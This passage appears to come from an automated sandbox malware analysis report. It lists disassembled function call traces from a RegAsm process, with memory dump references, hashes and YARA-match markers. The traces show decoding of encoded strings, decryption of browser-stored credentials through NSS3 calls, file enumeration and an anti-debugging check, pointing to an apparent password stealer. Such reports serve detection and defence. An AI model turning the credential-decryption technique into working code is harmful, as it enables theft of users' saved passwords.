                                                                                                                                                                                                                                                                  • PR_ExplodeTime.NSS3(00000000,6C911C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C911C6F,00000000,00000004,?,?), ref: 6C966C94
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                                                                  • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                  • API String ID: 3534712800-180463219
                                                                                                                                                                                                                                                                  • Opcode ID: a21fcfdb4a8bba58f59df0602d1c6e94a2634d2f05e1978a70b25772735dd703
                                                                                                                                                                                                                                                                  • Instruction ID: e04075e240452f4370f46a9e858a270060d21253a768c00ac071fd6b41b15199
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a21fcfdb4a8bba58f59df0602d1c6e94a2634d2f05e1978a70b25772735dd703
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42514B72B016494FD71CCDADDC626DABBDAABE4310F48C23AE442DBB81D638D906C751
                                                                                                                                                                                                                                                                  Function 00408331 Relevance: 15.1, APIs: 10, Instructions: 83stringencryptionCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408358
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(0040865D,00000001,?,00000014,00000000,00000000,?,0040865D,00000014), ref: 00408372
                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(0040865D,00000000,?,0040865D,00000014), ref: 0040837C
                                                                                                                                                                                                                                                                  • PK11_GetInternalKeySlot.NSS3(?,0040865D,00000014), ref: 0040838A
                                                                                                                                                                                                                                                                  • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,0040865D,00000014), ref: 0040839F
                                                                                                                                                                                                                                                                  • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 004083CA
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004083E4
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00425BDF,00425BE3), ref: 0040840B
                                                                                                                                                                                                                                                                  • PK11_FreeSlot.NSS3(?), ref: 00408414
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00425BDF,00425BE6), ref: 00408423
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2251291257-0
                                                                                                                                                                                                                                                                  • Opcode ID: 801328dbfd49d302778777b0cca62817c6461223659e36b6293a987a07066ae8
                                                                                                                                                                                                                                                                  • Instruction ID: c7116d44dcb7e37456b26bc2191b5c7f9723195d8140012dcbb83e7ffcbbf228
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 801328dbfd49d302778777b0cca62817c6461223659e36b6293a987a07066ae8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F216975D0011EEFDB009F94AD85AEEBBBDAB08344F14007AF505F2251EB389A459BA9
                                                                                                                                                                                                                                                                  Function 00409953 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 441fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00409958
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00425BFE,00000000,75B0AC90), ref: 004099B7
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425E34), ref: 004099D4
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425E38), ref: 004099EE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00409F5A
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00409F69
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                                  • String ID: "$\*.*
                                                                                                                                                                                                                                                                  • API String ID: 1275501236-2874818444
                                                                                                                                                                                                                                                                  • Opcode ID: 4d4b4cbfe08da6415348f3d4d0d959f0bcd8a4a06266aefb0e3acec25f657d7d
                                                                                                                                                                                                                                                                  • Instruction ID: bc138630e58538e096eedcb1e8ab2578a0b0f2b81e8206e02c277311e92657fa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d4b4cbfe08da6415348f3d4d0d959f0bcd8a4a06266aefb0e3acec25f657d7d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C124B71900249EADF15EBA5C856BEEBB78AF15308F5440BEA10A735C2DF381B4CCB65
                                                                                                                                                                                                                                                                  Function 0041AA07 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0041D7BA
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D7CF
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(0042A1F8), ref: 0041D7DA
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041D7F6
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 0041D7FD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                  • String ID: A
                                                                                                                                                                                                                                                                  • API String ID: 2579439406-773618204
                                                                                                                                                                                                                                                                  • Opcode ID: e61c9fdd7d59faaa1fb35f39a43005a92861c5d66de15950e2ef1c538c06ca0f
                                                                                                                                                                                                                                                                  • Instruction ID: dfcd42966c65ff7a275a9210eb723ab94f029a2cc6d35351f7e83f8be8000ec5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e61c9fdd7d59faaa1fb35f39a43005a92861c5d66de15950e2ef1c538c06ca0f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4121F3BC901204EFC720DF54FD896943BB2FB0B354F90602AE9088B660E7B459D6CF0A
                                                                                                                                                                                                                                                                  Function 6C9E9D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C8A8637,?,?), ref: 6C9E9E88
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C8A8637), ref: 6C9E9ED6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • database corruption, xrefs: 6C9E9ECA
                                                                                                                                                                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C9E9ECF
                                                                                                                                                                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9E9EC0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                  • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                                  • Opcode ID: be0102142f8fdafc006026afb831714bebe17ae5a665f23bebce42252dd69e87
                                                                                                                                                                                                                                                                  • Instruction ID: 9c87c52ff2d6039e2074e07e34850c3336bc44980845b8f9ff6dcc06b6fc6ff8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be0102142f8fdafc006026afb831714bebe17ae5a665f23bebce42252dd69e87
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E381C131B012158FCB05CFAAC880AEEB3F6BF5D304B168529E905AB741E730ED45CB90
                                                                                                                                                                                                                                                                  Function 00406295 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48encryptionmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,LY@,00000000,00000000), ref: 004062B5
                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,LY@,?,?,0040594C,00000000,?,?), ref: 004062C3
                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,LY@,00000000,00000000), ref: 004062D9
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,0040594C,00000000,?,?), ref: 004062E8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                                  • String ID: LY@
                                                                                                                                                                                                                                                                  • API String ID: 4291131564-2607024699
                                                                                                                                                                                                                                                                  • Opcode ID: ff7a57e258ee2194db69353549e44c41c40a75a87964d0ac16916db8d030a75f
                                                                                                                                                                                                                                                                  • Instruction ID: 80a2873ec0a64e8eb603e25657dde534be305fd059cf9ee24838eb94d5400c67
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff7a57e258ee2194db69353549e44c41c40a75a87964d0ac16916db8d030a75f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD012874101224BFCB215F56CC88E8B7FB9EF4BBA0B104069F909EA250D7709990DBA4
                                                                                                                                                                                                                                                                  Function 00402484 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52encryptionCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004024A9
                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024CF
                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024E9
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BinaryCryptString$memset
                                                                                                                                                                                                                                                                  • String ID: UNK
                                                                                                                                                                                                                                                                  • API String ID: 1505698593-448974810
                                                                                                                                                                                                                                                                  • Opcode ID: 4fd0c10caa2281c40fb319e1c4e2cda1ee936a09edb20a0fbd5da67967452272
                                                                                                                                                                                                                                                                  • Instruction ID: f8b40498284c7a7a39705aaa28010f8a985b63c5a00aeb1b0a1add28cc7342c0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fd0c10caa2281c40fb319e1c4e2cda1ee936a09edb20a0fbd5da67967452272
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 680162B290015CBEE711E699DEC1DFF77ACEB45698F00006BB604A2181D6F4AE445A78
                                                                                                                                                                                                                                                                  Function 6C9E0C40 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 509fcd85c2a74a12be7cbba117527d0f49d6eef0e325feea3b80436ef0bad4ef
                                                                                                                                                                                                                                                                  • Instruction ID: adbd3dfbf04daca007950aca6c0600d000060b3cbc060ce8cfd915fb156bcaec
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 509fcd85c2a74a12be7cbba117527d0f49d6eef0e325feea3b80436ef0bad4ef
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D511CE787043069FCB11DF28D88066A7BA6FF89368F148479D81A8B701DB31E806CBA1
                                                                                                                                                                                                                                                                  Function 0040E346 Relevance: 93.4, APIs: 62, Instructions: 416memorystringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040E34B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: _EH_prolog.MSVCRT ref: 0040E250
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: lstrlenA.KERNEL32(?,6CDA7FA0,75AA5460,00000000), ref: 0040E274
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: strchr.MSVCRT ref: 0040E286
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,6CDA7FA0,00000000), ref: 0040E39A
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,6CDA7FA0,00000000), ref: 0040E3A1
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,6CDA7FA0,00000000), ref: 0040E3B6
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,6CDA7FA0,00000000), ref: 0040E3BD
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E3F6
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E40D
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E414
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E43A
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E441
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E448
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E44F
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E464
